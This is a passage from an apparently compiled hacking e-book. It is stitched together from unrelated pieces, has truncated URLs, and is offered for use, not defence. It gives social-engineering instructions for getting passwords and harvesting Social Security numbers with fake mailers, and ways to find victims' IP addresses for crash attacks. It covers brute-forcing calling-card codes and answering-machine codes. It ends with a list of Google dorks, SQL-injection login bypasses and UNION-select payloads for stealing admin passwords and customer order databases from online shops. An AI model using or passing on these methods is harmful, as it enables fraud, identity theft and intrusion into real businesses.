I guess it is to a point. Hacking takes more advantage of holes in security while the social engineering takes advantage of holes in people's common sense. Finding your marks through a hole in the fingering system is a great way to start an engineer. Many fingers give full names last logins, login locations and all sorts of info. Find someone who hasn't been on in quite sometime. There are also the classic schemes. Pretending to be a sysop in an IRC or online chat room can make people give up passwords with ease. Yes, generally actions taken in the Internet or online are considered traditional hacking, but your knowledge of the average human's wetware comes into play. SECTION V: LIVE, FROM NEW YORK... 5.1 In person? Yup. This is pretty damn important. You can do quite a bit over a phone or through mail, but sometimes you just have to get off your ass and do things yourself. Getting a password digging through a desk is good, so is touring an office and just looking around. Even conning your way into a terminal works. 5.2 Equipment This is the only time in hacker culture where looks matter a great deal. Don't expect to walk into VIACOM's offices wearing your Misfits T-shirt with lotsa zits and your walkman makes you look suspicious. Look dignified. Wear a suit. Comb your hair. Don't get out of hand. Be polite. If you want to look like you belong in that office, you should act that way, too. So you need a suit. If you weigh more than 200 lbs (and are under 6' 2") or look like you're 20 or younger, don't try this. You'll look dumb, be laughed at and possibly have security called on you. You can look like an office worker's kid if you're that young. If you can do this, go ahead. Most of us can't. Fake ID security cards (the kind that aligator clip to a belt or something) can be made with a photo, a layout program and a lamination sheet. This just makes you look more official. Sometimes one of this stick on visitor patches can be helpful. They make you look like your Mail:mtahirzahid@yahoo.com

Page 410


Power Of Hacking速 unnatural observation is warrented by your visiting status. 5.3 I'm sweating in this suit..now what? Walk into an office building with confidence. Flash your badge or just have your visitor tag. Pretend you really belong there. That's how you look. An office with cubicles is great. Just walk around and peer at people's belongings. Find the company's UNIX minicomputer. They tend to keep them behind a big plate glass window, so you can check out how its connected. This is good scouting without having to sift through dumpsters or watching through binoculars. DO NOT TRY TO HACK WHILE IN THE BUILDING! IT'S PRETTY SUSPICIOUS LOOKING! SECTION VI: PUTTING IT TOGETHER You want to see what your school's minutes are or you want to hack a local chemical company to see their new toxins, but even if you had access it would be problematic to access the passwords because they are running a VAX. Now what? First you get a list of employees. For schools, just use the catalog. For companies, use a live engineering technique. Look for payroll sheets, or posted employee lists. If you look right, you can just ask a low level employee for a list. Remember, be calm in front of people. You have to maintain your credibility. Finger each employee's account. Find out who has or hasn't used their account in the past few months. Those who haven't are your marks. Write those names down cause your gonna play them for all they are worth, goddammit. Now we go to the phone book and get the employees addresses. Then we create a document in our DTP program that emmulates a short sweepstakes form or another short document commonly encountered in the field. It must look professional but subtle enough not to look false. Credibility once again. Remember to include the social security number space as well as other information. Send these out and wait or masturbate or whatever you do for a few days. Yes, you're going to have to spend $10 on stamps unless you are on good terms with who you Mail:mtahirzahid@yahoo.com

Page 411


Power Of Hacking速 engineered in person. If they trust you, go back and use the stamping machine..might as well. Now get your phone and call their sysadm. Use women voices first because the guys that run these machines have rarely seen daylight, let alone women. They are EASILY manipulated with a woman's voice. Sound helpless, they love it. If they don't give you your password, you'll have plenty of info for them for verification. If you pretend to be a woman, they'll give youplenty of leway. Go as far as saying you've seen them at work and think they are cute. Watch the passwords fly. How to use the Web to look up information on hacking ____________________________________________________________ Want to become really, really unpopular? Try asking your hacker friends too many questions of the wrong sort. But, but, how do we know what are the wrong questions to ask? OK, I sympathize with your problems because I get flamed a lot, too. That's partly because I sincerely believe in asking dumb questions. I make my living asking dumb questions. People pay me lots of money to go to conferences, call people on the phone and hang out on Usenet news groups asking dumb questions so I can find out stuff for them. And, guess what, sometimes the dumbest questions get you the best answers. So that's why you don't see me flaming people who ask dumb questions. ******************************************************** Newbie note: Have you been too afraid to ask the dumb question, "What is a flame?" Now you get to find out! It is a bunch of obnoxious rantings and ravings made in email or a Usenet post by some idiot who thinks he or she is proving his or her mental superiority through use of foul and/or impolite language such as "you suffer from rectocranial inversion," f*** y***, d****, b****, and of course @#$%^&*! This newbie note is my flame against those flamers to whom I am soooo superior. ******************************************************** But even though dumb questions can be good to ask, you may not like the flames they bring down on you. So, if you want to avoid flames, how do you find out answers for yourself? This Guide covers one way to find out hacking information without having to ask people questions: by surfing the Web. The other way is to buy lots and lots of computer manuals, but that costs a lot of money. Also, in some parts of the world it is difficult to get manuals. Fortunately, however, almost anything you want to learn about computers and communications is available for free somewhere on the Web. First, let's consider the Web search engines. Some just help you search the Web itself. But others enable you to search Usenet newsgroups that have been archived for many years back. Also, the best hacker email lists are archived on the Web, as well. More how to search for hacker knowledge... There are two major considerations in using Web search engines. One is what search engine to use, and the other is the search tactics themselves. I have used many Web search engines. But eventually I came to the conclusion that for Mail:mtahirzahid@yahoo.com

Page 412


Power Of Hacking速 serious research, you only need two: Alavista (<http://altavista.digital.com/>)and Dejanews (<http://www.dejanews.com/>). Altavista is the best for the Web, while Dejanews is the best one for searching Usenet news groups. But, if you don't want to take me at my word, you may surf over to a site with links to almost all the Web and Newsgroup search engines at <http://sgk.tiac.net/search/>. But just how do you efficiently use these search engines? If you ask them to find "hacker" or even "how to hack," you will get bazillions of Web sites and news group posts to read. OK, so you painfully surf through one hacker Web site after another. You get portentous-sounding organ music, skulls with red rolling eyes, animated fires burning, and each site has links to other sites with pretentious music and ungrammatical boastings about "I am 31337, d00dz!!! I am so *&&^%$ good at hacking you should bow down and kiss my $%^&&*!" But somehow they don't seem to have any actual information. Hey, welcome to the wannabe hacker world! You need to figure out some words that help the search engine of your choice get more useful results. For example, let's say you want to find out whether I, the Supreme R00ler of the Happy Hacker world, am an elite hacker chick or merely some poser. Now the luser approach would to simply go to http://www.dejanews.com and do a search of Usenet news groups for "Carolyn Meinel," being sure to click the "old" button to bring up stuff from years back. But if you do that, you get this huge long list of posts, most of which have nothing to do with hacking: CDMA vs GSM - carolyn meinel <cmeinel@unm.edu> 1995/11/17 Re: October El Nino-Southern Oscillation info gonthier@usgs.gov (Gerard J. Gonthier) 1995/11/20 Re: Internic Wars MrGlucroft@psu.edu (The Reaver) 1995/11/30 shirkahn@earthlink.net (Christopher Proctor) 1995/12/16 Re: Lyndon LaRouche - who is he? lness@ucs.indiana.edu (lester john ness) 1996/01/06 U-B Color Index observation data - cmeinel@nmia.com (Carolyn P. Meinel) 1996/05/13 Re: Mars Fraud? History of one scientist involved gksmiley@aol.com (GK Smiley) 1996/08/11 Re: Mars Life Announcement: NO Fraud Issue twitch@hub.ofthe.net 1996/08/12 Hackers Helper E-Zine wanted - rcortes@tuna.hooked.net (Raul Cortes) 1996/12/06 Carolyn Meinel, Sooooooper Genius - nobody@cypherpunks.ca (John Anonymous MacDonald, a remailer node) 1996/12/12 Anyhow, this list goes on and on and on. But if you specify "Carolyn Meinel hacker" and click "all" instead of "any" on the "Boolean" button, you get a list that starts with: Media: "Unamailer delivers Christmas grief" -Mannella@ipifidpt.difi.unipi.it (Riccardo Mannella) 1996/12/30 Cu Digest, #8.93, Tue 31 Dec 96 - Cu Digest (tk0jut2@mvs.cso.niu.edu) <TK0JUT2@MVS.CSO.NIU.EDU> 1996/12/31 RealAudio interview with Happy Hacker - bmcw@redbud.mv.com (Brian S. McWilliams) 1997/01/08 Etc. Mail:mtahirzahid@yahoo.com

Page 413


Power Of Hacking速 This way all those posts about my boring life in the world of science don't show up, just the juicy hacker stuff. Now suppose all you want to see is flames about what a terrible hacker I am. You could bring those to the top of the list by adding (with the "all" button still on) "flame" or "f***" or "b****" being careful to spell out those bad words instead fubarring them with ****s. For example, a search on "Carolyn Meinel hacker flame" with Boolean "all" turns up only one post. This important tome says the Happy Hacker list is a dire example of what happens when us prudish moderator types censor naughty words and inane diatribes. ****************************************** Newbie note: "Boolean" is math term. On the Dejanews search engine they figure the user doesn't have a clue of what "Boolean" means so they give you a choice of "any" or "all" and then label it "Boolean" so you feel stupid if you don't understand it. But in real Boolean algebra we can use the operators "and" "or" and "not" on word searches (or any searches of sets). "And" means you would have a search that turns up only items that have "all" the terms you specify; "or" means you would have a search that turns up "any" of the terms. The "not" operator would exclude items that included the "not" term even if they have any or all of the other search terms. Altavista has real Boolean algebra under its "advanced"" search option. ****************************************** But let's forget all those Web search engines for a minute. In my humble yet old-fashioned opinion, the best way to search the Web is to use it exactly the way its inventor, Tim BernersLee, intended. You start at a good spot and then follow the links to related sites. Imagine that! Here's another of my old fogie tips. If you want to really whiz around the Web, and if you have a shell account, you can do it with the program lynx. At the prompt, just type "lynx followed by the URL you want to visit. Because lynx only shows text, you don't have to waste time waiting for the More how to search for hacker knowledge... So where are good places to start? Simply surf over to the Web sites listed at the end of this Guide. Not only do they carry archives of these Guides, they carry a lot of other valuable information for the newbie hacker, as well as links to other quality sites. My favorites are http://www.cs.utexas.edu/users/matt/hh.html and http://www.silitoad.org Warning: parental discretion advised. You'll see some other great starting points elsewhere in this Guide, too. Next, consider one of the most common questions I get: "How do I break into a computer????? :( :(" Ask this of someone who isn't a super nice elderly lady like me and you will get a truly rude reaction. Here's why. The world is full of many kinds of computers running many kinds of software on many kinds of networks. How you break into a computer depends on all these things. So you need to thoroughly study a computer system before you an even think about planning a strategy to break into it. That's one reason breaking into computers is widely regarded as the pinnacle of hacking. So if you don't realize even this much, you need to do lots and lots of homework before you can even dream of breaking into computers. But, OK, I'll stop hiding the secrets of universal computer breaking and entry. Check out: Bugtraq archives: <http://www.securityfocus.com/> NT Bugtraq archives: <http://www.ntbugtraq.com/> *************************************************** Mail:mtahirzahid@yahoo.com

Page 414


Power Of Hacking速 You can go to jail warning: If you want to take up the sport of breaking into computers, you should either do it with your own computer, or else get the permission of the owner if you want to break into someone else's computer. Otherwise you are violating the law. In the US, if you break into a computer that is across a state line from where you launch your attack, you are committing a Federal felony. If you cross national boundaries to hack, remember that most nations have treaties that allow them to extradite criminals from each others' countries. *************************************************** Wait just a minute, if you surf over to those site you won't instantly become an Ubercracker. Unless you already are an excellent programmer and knowledgeable in Unix or Windows NT, you will discover the information at these two sites will *NOT* instantly grant you access to any victim computer you may choose. It's not that easy. You are going to have to learn how to program. Learn at least one operating system inside and out. Of course some people take the shortcut into hacking. They get their phriends to give them a bunch of canned break-in programs. Then they try them on one computer after another until they stumble into root and accidentally delete system files. The they get busted and run to the Electronic Freedom Foundation and whine about how the Feds are persecuting them. So are you serious? Do you *really* want to be a hacker badly enough to learn an operating system inside and out? Do you *really* want to populate your dreaming hours with arcane communications protocol topics? The old-fashioned, and super expensive way is to buy and study lots of manuals. <Geek mode on> Look, I'm a real believer in manuals. I spend about $200 per month on them. I read them in the bathroom, while sitting in traffic jams, and while waiting for doctor's appointments. But if I'm at my desk, I prefer to read manuals and other technical documents from the Web. Besides, the Web stuff is free! <Geek mode off> The most fantastic Web resource for the aspiring geek, er, hacker, is the RFCs. RFC stands for "Request for Comment." Now this sounds like nothing more than a discussion group. But actually RFCs are the definitive documents that tell you how the Internet works. The funny name "RFC" comes from ancient history when lots of people were discussing how the heck to make that ARPAnet thingy work. But nowadays RFC means "Gospel Truth about How the Internet Works" instead of "Hey Guys, Let's Talk this Stuff Over." ******************************************************** Newbie note: ARPAnet was the US Advanced Research Projects Agency experiment launched in 1969 that evolved into the Internet. When you read RFCs you will often find references to ARPAnet and ARPA -- or sometimes DARPA. That "D" stands for "defense." DARPA/ARPA keeps on getting its name changed between these two. For example, when Bill Clinton became US President in 1993, he changed DARPA back to ARPA because "defense" is a Bad Thing. Then in 1996 the US Congress passed a law changing it back to DARPA because "defense" is a Good Thing. ******************************************************** Now ideally you should simply read and memorize all the RFCs. But there are zillions of RFCs and some of us need to take time out to eat and sleep. So those of us without photographic memories and gobs of free time need to be selective about what we read. So how do we find an RFC that will answer whatever is our latest dumb question? One good starting place is a complete list of all RFCs and their titles at ftp://ftp.tstt.net.tt/pub/inet/rfc/rfc-index. Although this is an ftp (file transfer protocol) site, you can access it with your Web browser. (Sorry, that above location is now gone. Nowadays you can find an organized set of RFCs hyperlinked together at Connected: An Internet Encyclopedia , Mail:mtahirzahid@yahoo.com

Page 415


Power Of Hacking速 <http://www.FreeSoft.org/Connected/>. I can't even begin to explain to you how wonderful this site is. You just have to try it yourself. Other sets of searchable RFCs are at: <http://www.rfc-editor.org/rfc.html> <http://www.faqs.org/rfcs/> <http://www.pasteur.fr/infosci/RFC/> <http://www.normos.org/> <http://www.csl.sony.co.jp/rfc/>) Or, how about the RFC on RFCs! That's right, RFC 825 is "intended to clarify the status of RFCs and to provide some guidance for the authors of RFCs in the future. It is in a sense a specification for RFCs." To find this RFC, or in fact any RFC for which you have its number, just go to Altavista and search for "RFC 825" or whatever the number is. Be sure to put it in quotes just like this example in order to get the best results. Whoa, these RFCs can be pretty hard to understand! Heck, how do we even know which RFC to read to get an answer to our questions? Guess what, there is solution, a fascinating group of RFCs called "FYIs" Rather than specifying anything, FYIs simply help explain the other RFCs. How do you get FYIs? Easy! I just surfed over to the RFC on FYIs (1150) and learned that: FYIs can be obtained via FTP from NIC.DDN.MIL, with the pathname FYI:mm.TXT, or RFC:RFCnnnn.TXT (where "mm" refers to the number of the FYI and "nnnn" refers to the number of the RFC). Login with FTP, username ANONYMOUS and password GUEST. The NIC also provides an automatic mail service for those sites which cannot use FTP. Address the request to SERVICE@NIC.DDN.MIL and in the subject field of the message indicate the FYI or RFC number, as in "Subject: FYI mm" or "Subject: RFC nnnn". But even better than this is an organized set of RFCs hyperlinked together on the Web at http://www.FreeSoft.org/Connected/. I can't even begin to explain to you how wonderful this site is. You just have to try it yourself. Admittedly it doesn't contain all the RFCs. But it has a tutorial and a newbie-friendly set of links through the most important RFCs. Last but not least, you can check out two sites that offer a wealth of technical information on computer security: http://csrc.nist.gov/secpubs/rainbow/ http://GANDALF.ISU.EDU/security/security.html security library I hope this is enough information to keep you busy studying for the next five or ten years. But please keep this in mind. Sometimes it's not easy to figure something out just by reading huge amounts of technical information. Sometimes it can save you a lot of grief just to ask a question. Even a dumb question. Hey, how would you like to check out the Web site for those of us who make our living asking people dumb questions? Surf over to http://www.scip.org. That's the home page of the Society of Competitive Information Professionals, the home organization for folks like me. So, go ahead, make someone's day. Have phun asking those dumb questions. Just remember to fireproof your phone and computer first!

HOW TO OBTAIN AN IP ADRESS ***************************************** WRITTEN BY: NY_2 Mail:mtahirzahid@yahoo.com

Page 416


Power Of Hacking速 (af326@seorf.ohiou.edu) (ny_2_@hotmail.com) *****************************************

All these newbies ask how do I obtain an ip adress. I see it all the time. In Yahoo chat rooms,(there is usually some lamer named X_hackerMaStEr_X asking how to get an ip for his winuke-but I'm not here to put down lamers) i see it in alt.2600 all the time..., course this newsgroup has enough problems. Enough of this, let's get on the subject.....

First of all, you must decide wether you want to start here, and go to better things, or just want to get an ip and winuke for the rest of your life(we will kinda stick with this, cause this txt isnt for "elite"-I use that term loosley)

If you want to go on to better things, I suggest that you read up on the working of tcp/ip, the stacks, ect. But for now we will concentrate on the ppl who want to use their winuke, land, teardrop, boink, ect.

An ip will consist of anywhere from 8 to 12 numbers. ex. 207.146.51.3 (dont put this in, I made it up) Usually the first 3 sets of numbers are his isp's subnet mask and the last set of numbers seperates him from the rest of the ppl on his/her isp.(isp=internet service provider)

The first method you can try is try to get the bastard to send you an email. if you are using Winblows 95, and i assume most of you are(boy, i love those GUI's.......lol) look at the message header, or if its through your email client(Outlook Express, Eudora ect) click on the email and then options, and then properties, and it should be there.(This was for a 4th gen browser, IE 4.0. I assume that you can find it yourself on others)

If the victim has logged off since then, then this wont work, naturally. The second method I have seen work is to get in those shitty chat rooms, and they usually have a user info tab, and that will usually tell you the ip adress(ex of shitty chat rooms-french kiss------*if you have trouble finding one you can go to my site i created years ago- http://www.seorf.ohiou.edu/~af326/chat.html)

Mail:mtahirzahid@yahoo.com

Page 417


Power Of Hacking速 And to defend yourself, I suggest that you obtain patches for port 139(the port that your nuke sends OOB data to crash the victims comp)(*OOB=out of band data*) or you can get something like scream's port watcher, or anti-nuke-I have it if you want it drop me a line. These settings allow you to boost the speed of your broadband Internet connection when using a Cable Modem or DSL Router with Windows 2000 and Windows XP.

Open your registry and find the key below.

Create the following DWORD values, as most of these values will not already exist you will need to create them by clicking on 'Edit -> New -> DWORD Value' and then set the value as shown below.

DefaultTTL = "80" hex (or 128 decimal) Specifies the default time to live (TTL) for TCP/IP packets. The default is 32.

EnablePMTUBHDetect = "0" Specifies whether the stack will attempt to detect Maximum Transmission Unit (MTU) routers that do not send back ICMP fragmentation-needed messages. The default is 0.

EnablePMTUDiscovery = "1" Specifies whether the TCP/IP stack will attempt to perform path MTU discovery as specified in RFC 1191. The default is 1.

GlobalMaxTcpWindowSize = "7FFF" hex (or 32767 decimal) Specifies the system maximum receive window size advertised by the TCP/IP stack.

TcpMaxDupAcks = "2" Determines the number of duplicate ACKs that must be received for the same sequence number of sent data before "fast retransmit" is triggered.

SackOpts = "1"

Mail:mtahirzahid@yahoo.com

Page 418


Power Of HackingÂŽ Enables support for selective acknowledgements as documented by Request for Comment (RFC) 2018. Default is 0.

Tcp1323Opts = "1" Controls RFC 1323 time stamps and window scaling options. Possible values are: "0" = disable RFC 1323 options, "1" = window scale enabled only, "2" = time stamps enabled only and "3" = both options enabled.

TcpWindowSize = "7FFF" hex (or 32767 decimal) Specifies the receive window size advertised by the TCP/IP stack. If you have a latent network you can try increasing the value to 93440, 186880, or 372300.

Exit your registry and restart Windows for the changes to take effect.

If you donâ€&#x;t want to edit the registry, here's a little TCP utility that is ideal...

http://www.broadbandreports.com/front/doctorping.zip

--------------------------------------Title| Hacking Calling Cards ---------------------------------------

Phreak codes are fast running out, and people are getting caught. Its time to pioneer a brand new industry. So far I think this file is original, so I am writing it.

Mail:mtahirzahid@yahoo.com

Page 419


Power Of Hacking速 Most, if not all people have calling cards from AT&T. They can be used from any phone to dial long distance and charge it to your AT&T bill. The objective, to use someone elses card to get free long distance service. These codes are not traced, and they are only FOUR digits! The nice part is you can hack the code for anyone you like and attack a specific person, not a random name like when hacking MCI. Take your worst enemy, when you know his phone number, its the end...

Format: a. Dial 0. b. Dial phone number with area code. c. Wait for tone. d. Dial billing number with or without area code.

If your code is correct, the fone will ring. If it is not correct a recording will say "Please dial your card number again, the card number you have dialed is invalid". You can try another four digits but after that it will tell you to call AT&T if it is still invalid. Mail:mtahirzahid@yahoo.com

Page 420


Power Of Hacking速

This is more of a pain to hack because there are a thousand possible codes for each phone number. Just make a short basic program to do the job of dialing all the codes. its best to do a random scan instead of sequential in my opinion.

If you have something you can add to this file then please tell me... Hacking AT&T Answering Machines 1. Dial telephone and wait for AT&T Answering Machine to answer. 2. Quickly Enter the following string. 1234567898765432135792468642973147 (btw: this is the shortest 4193366994488552277539596372582838

string for entering every

491817161511026203040506070809001

possible 2-digit combo.)

3. You'll know you hit the code because the messages will start playing. 4. Heres a list of TouchTone(c) Commands

Listen to messages: 7 Listen to new messages: 6 Stop: # Rewind Tape: 2 Advance Tape: 5 Clear Messages: 3,3 Record memo: * Record Announcement: 4,* Play Announcement: 4,1 Turn System On: 0 Mail:mtahirzahid@yahoo.com

Page 421


Power Of Hacking速 Turn System Off: 8,8 *************************************************************************** * CABLE TV SCRAMBLING TECHNIQUES ------------------------------------------------------------------------------There are 4 major methods of pay-channel security and each has different consequences for cable ready receivers. The 4 systems are jamming, trapping out-of-band scrambling and in-band scrambling. Jamming: A jamming signal is placed between the picture carrier and and the aural carrier of the secured channels. The cable operator supplies a filter for each customer for each paid channel. This type of security is easily defeated by homemade notch filters. Trapping: In these systems frequency filters are installed in line with the cable drops on telephone poles. The traps are removed for customers paying for the premium channels. Cable-ready TV's work fine in these systems. Scrambling - The gated Sync Methods: Scrambling in the cable TV business still generaly means pulsed sync suppression. In its simplist form, amplitude of the picture carrier is reduced by 6 db during the horizontal blanking intervals and sometimes during the vertical blanking intervals. The resulting video signal has sync tips between the black and white levels. Sync seperators in the set cannot operate properly with this signal, nor can AGC and color circuts, so the picture is scrambled. The decoder compensates by antennuating the signal during the time in which the transmited signal was not antennuated. In order to accomplish this, the logic controlled gain switch must get timing information. In-band systems transmit pulses as amplitude modulation of aural carrier or a seperate carrier in out of band systems. Out of band scrambling: The usual setup is that the decoder is connected directly to the cable ahead of the channel converter. Decoding is done at the pay channel frequency. Mail:mtahirzahid@yahoo.com

Page 422


Power Of Hacking速 The decoder is likely to be in a seperate box, added to an old system to provide pay channels. The box consists of a simple receiver (90-120mhz) for the out-of-band data carrier and a broad band 6db gain switch. There is provision for several scrambled channels, each which has a different data carrier. This system is directly compatable with cable ready receivers. Without the cable converter, the decoder is connected to the TV. Tuning and remote features of the TV are preserved with the only inconvience being the need to operate the switch on the decoder when changing to and from any scrambled channel. Out-ofband systems tend to last until the operators using them rebuild to provide for a large increase in the number of channels. In Band Scrambling: In this system any number of the available channels can be scrambled. Because the data carrier for each scrambled channel is its own aural carrier, only one data receiver, at the aural carrier frequency (eg. ch 3) is required. The decoder detects the presence or absense of data automaticly switching itself in or out. The converter-decoder box can be hardwired to decode just the channels ordered, using a prom like device. Alternatively, the transmitted channels can be "tagged" by time division multiplexing binary tag (program identification) data with the sync data on the aural carrier. The decoder boxes can be wired for "tiers" (groups of programs the cable operator sells togeather) rather than fixed channels, giving the operator more flexibility. The decoder boxes can be "addressable". These boxes have a seperate out of band data channel for data from the head end. Each box has a serial number burned into its logic or otherwise available to its logic circutry, and its channel or tier authorization stored in volatile ram. A computer at the headend periodicaly addresses all decoders in the system individualy and loads each with the channel or tier capacity ordered by the customer. The need for house calls is reduced, PPV (Pay per view) is possible, and missing boxes cam be turned off, rendering them useless for premium channel viewing. Some but not all of these features can be programmed into out-of-band systems. Aside form their ability to generate sync pulses, thus foiling the scrambling system, cable ready TV's have presented another dificult problem for in-band systems. Because the decoder operates at the converted channel, a channel converter is required ahead of it. Wheather the TV receiver is cable-ready or not, it operates only at the converted channel, wasting the tuning and remote Mail:mtahirzahid@yahoo.com

Page 423


Power Of Hacking速 control features.

Mail:mtahirzahid@yahoo.com

Page 424


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 425


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 426


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 427


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 428


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 429


Power Of Hacking速

Mail:mtahirzahid@yahoo.com

Page 430


Power Of Hacking速

Exploits For Hacking CC Database 1google dork :--> inurl:"/cart.php?m=" Mail:mtahirzahid@yahoo.com

Page 431


Power Of Hacking速 target looks lile :--> http://xxxxxxx.com/s...cart.php?m=view exploit: chage cart.php?m=view to /admin target whit exploit :--> http://xxxxxx.com/store/admin Usename : 'or"=" Password : 'or"=" 2google dork :--> allinurlroddetail.asp?prod= target looks like :--> http://www.xxxxx.org/proddetail.asp?prod=XXXX (big leters and numbers ) exploit :--> chage the proddtail.asp?prod=SG369 whit fpdb/vsproducts.mdb target whit exploit :--> http://www.xxxxxx.org/fpdb/vsproducts.mdb 3google dork :--> allinurl: /cgi-local/shopper.cgi target looks like :--> http://www.xxxxxx.co....dd=action&key= exploit :--> ...&template=order.log target whit exploit :--> http://www.xxxxxxxx.....late=order.log 4google dork :--> allinurl: Lobby.asp target looks like :--> http://www.xxxxx.com/mall/lobby.asp exploit :--> change /mall/lobby.asp to /fpdb/shop.mdb target whit exploit :--> http://www.xxxxx.com/fpdb/shop.mdb 5google dork :--> allinurl:/vpasp/shopsearch.asp when u find a target put this in search box Keyword=&category=5); insert into tbluser (fldusername) values ('')--&SubCategory=&hide=&action.x=46&action.y=6 Keyword=&category=5); update tbluser set fldpassword='' where fldusername=''--&SubCategory=All&action.x=33&action.y=6 Keyword=&category=3); update tbluser set fldaccess='1' where fldusername=''--&SubCategory=All&action.x=33&action.y=6 Jangan lupa untuk mengganti dan nya terserah kamu. Untuk mengganti password admin, masukkan keyword berikut : Keyword=&category=5); update tbluser set fldpassword='' where fldusername='admin'--&SubCategory=All&action.x=33&action.y=6 login page: http://xxxxxxx/vpasp/shopadmin.asp 6google dork :--> allinurl:/vpasp/shopdisplayproducts.asp target looks like :--> http://xxxxxxx.com/v....asp?cat=xxxxxx exploit :-Mail:mtahirzahid@yahoo.com

Page 432


Power Of Hacking速 > http://xxxxxxx.com/vpasp/shopdisplay...20union%20sele ct%20fldauto,fldpassword %20from%20tbluser%20where% 20fldusername='admin'%20and%20fldpassword%20like%2 0'a%25'if this is not working try this ends %20'a%25'-%20'b%25'-%20'c%25'-after finding user and pass go to login page: http://xxxx.com/vpasp/shopadmin.asp 7google dork :--> allinurl:/shopadmin.asp target looks like :--> http://www.xxxxxx.com/shopadmin.asp exploit: user : 'or'1 pass : 'or'1 8google.com :--> allinurl:/store/index.cgi/page= target looks like :--> http://www.xxxxxx.co....short_blue.htm exploit :--> ../admin/files/order.log target whit exploit :--> http://www.xxxxxxx.c....iles/order.log 9google.com:--> allinurl:/metacart/ target looks like :--> http://www.xxxxxx.com/metacart/about.asp exploit :--> /database/metacart.mdb target whit exploit :--> http://www.xxxxxx.com/metacart/database/metacart.mdb 10google.com:--> allinurl:/DCShop/ target looks like :--> http://www.xxxxxx.com/xxxx/DCShop/xxxx exploit :--> /DCShop/orders/orders.txt or /DCShop/Orders/orders.txt target whit exploit :-> http://www.xxxx.com/xxxx/DCShop/orders/orders.txt or http://www.xxxx.com/xxxx/ DCShop/Orders/orders.txt 11google.com:--> allinurl:/shop/category.asp/catid= target looks like :--> http://www.xxxxx.com/shop/category.asp/catid=xxxxxx exploit :--> /admin/dbsetup.asp target whit exploit :--> http://www.xxxxxx.com/admin/dbsetup.asp after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb) target for dl the data base :--> http://www.xxxxxx.com/data/pdshoppro.mdb (dosent Mail:mtahirzahid@yahoo.com

Page 433


Power Of Hacking速 need to be like this) in db look for access to find pass and user of shop admins. 12google.com:--> allinurl:/commercesql/ target looks like :--> http://www.xxxxx.com/commercesql/xxxxx exploit :--> cgi-bin/commercesql/index.cgi?page= target whit exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pl target whit exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgi target whit exploit order.log :--> http://www.xxxxx.com....iles/order.log 13google.com:--> allinurl:/eshop/ target looks like :--> http://www.xxxxx.com/xxxxx/eshop exploit :-->/cg-bin/eshop/database/order.mdb target whit exploit :--> http://www.xxxxxx.co....base/order.mdb after dl the db look at access for user and password 141/search google: allinurl:"shopdisplayproducts.asp?id= --->http://victim.com/shopdisplayproducts.asp?id=5 2/find error by adding ' --->http://victim.com/shopdisplayproducts.asp?id=5' --->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467 -If you don't see error then change id to cat --->http://victim.com/shopdisplayproducts.asp?cat=5' 3/if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password --->http://victim.com/shopdisplayproduct...on%20select%20 1%20from%20tbluser"having%201=1--sp_password --->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match...... 4/ add 2,3,4,5,6.......until you see a nice table add 2 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2%20from%20tbluser"having%201=1--sp_password then 3 ---->http://victim.com/shopdisplayproduct...on%20select%20 Mail:mtahirzahid@yahoo.com

Page 434


Power Of Hacking速 1,2,3%20from%20tbluser"having%201=1--sp_password then 4 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sp_password ...5,6,7,8,9.... untill you see a table. (exp:...47) ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password ---->see a table.

5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password --->http://victim.com/shopdisplayproduct...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password 6/Find link admin to login: try this first: http://victim.com/shopadmin.asp or: http://victim.com/shopadmin.asp

Didn't work? then u have to find yourself: add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password --->http://victim.com/shopdisplayproduct...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password

you'll see something like: ( lot of them) shopaddmoretocart.asp shopcheckout.asp shopdisplaycategories.asp .............. then guess admin link by adding the above data untill you find admin links 15Mail:mtahirzahid@yahoo.com

Page 435


